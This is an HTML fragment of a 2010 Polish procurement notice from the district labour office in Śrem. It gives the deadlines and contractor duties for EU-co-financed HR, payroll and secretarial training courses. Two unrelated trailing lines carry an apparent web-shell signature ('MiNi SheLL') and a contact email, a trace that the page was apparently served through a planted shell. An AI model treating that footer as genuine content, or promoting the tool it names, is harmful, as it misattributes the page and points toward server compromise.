<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.srem.pl bądź www.pup.srem.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Śremie ul. Mickiewicza 56 63-100 Śrem pokój nr 11 (I piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Śremie ul. Mickiewicza 56 63-100 Śrem pokój nr 13 - sekretariat, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W związku z faktem, iż  szkolenia: B. Pracownik ds. kadrowo-płacowych i C. Pracownik ds. obsługi sekretariatu z elementami kadr i płac są realizowane w ramach projektu Bądź gotowy dziś...do zmian współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie aktywności zawodowej osób bezrobotnych  Programu Operacyjnego Kapitał Ludzki 2007-2013 Wykonawca zobowiązany jest do: 
1) zapoznania się z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z dnia 4 lutego 2009r. dostępnymi na stronie internetowej www.efs.gov.pl,
2) prowadzenia dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych (listę obecności bezrobotni winni podpisywać w każdym dniu zajęć, dodatkowo obecność uczestników na szkoleniu powinna być potwierdzona podpisem prowadzącego szkolenie w każdym dniu szkolenia),
3) przekazania uczestnikom materiałów szkoleniowych,
4) wydania uczestnikom zaświadczeń i/lub certyfikatów potwierdzających ukończenie szkolenia, 
5) sporządzenia listy dokumentującej odebranie przez uczestników szkolenia materiałów szkoleniowych, 
6) sporządzenia rejestru wydanych zaświadczeń i/lub certyfikatów,
7) oznaczenia w sposób określony w Wytycznych...:
1. miejsca szkolenia i sali szkoleniowej, 
2. materiałów szkoleniowych, 
3. prezentacji multimedialnych, 
4. list obecności, 
5. listy odbioru materiałów szkoleniowych, 
6. zaświadczeń i/lub certyfikatów (jeżeli ze względu na odrębne przepisy na zaświadczeniach nie wolno dokonywać oznaczeń) potwierdzających udział w szkoleniu,
7. rejestru wydanych zaświadczeń i/lub certyfikatów, 
8) poinformowania uczestników szkolenia o fakcie współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
9) dostarczenia do Powiatowego Urzędu Pracy w Śremie oryginałów lub potwierdzonych za zgodność z oryginałem kserokopii: 
1. list obecności, 
2. listy odbioru materiałów szkoleniowych, 
3. fotografii dokumentującej sposób oznaczenia miejsca szkolenia i sali szkoleniowej, 
4. egzemplarza materiałów szkoleniowych, 
5. kserokopii wydanych zaświadczeń i/lub certyfikatów, 
6. kserokopii rejestru wydanych zaświadczeń i lub/certyfikatów,
7. imiennych ankiet, 
8. kosztorysu powykonawczego,
9. oświadczenia o tym, iż koszty zawarte w kosztorysie zostały poniesione w przedstawiony sposób,
10) zapewnienia Zamawiającemu prawa wglądu do dokumentacji związanej z realizowanym szkoleniem, w tym do dokumentów finansowych,
11) przechowywania dokumentów związanych z realizowanym szkoleniem, w tym dokumentów finansowych do dnia 31 grudnia 2020r., informowania urzędu o ewentualnej zmianie miejsca archiwizacji ww. dokumentów oraz udostępniania dokumentów na prośbę Zamawiającego instytucjom kontrolującym projekt lub dostarczenia do Urzędu kserokopii ww. dokumentów potwierdzonych za zgodność z oryginałem.
Na zakończenie kursu jego uczestnicy winni wypełnić imienną ankietę służącą do oceny szkolenia oraz otrzymają stosowne zaświadczenie i/lub certyfikat o jego ukończeniu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com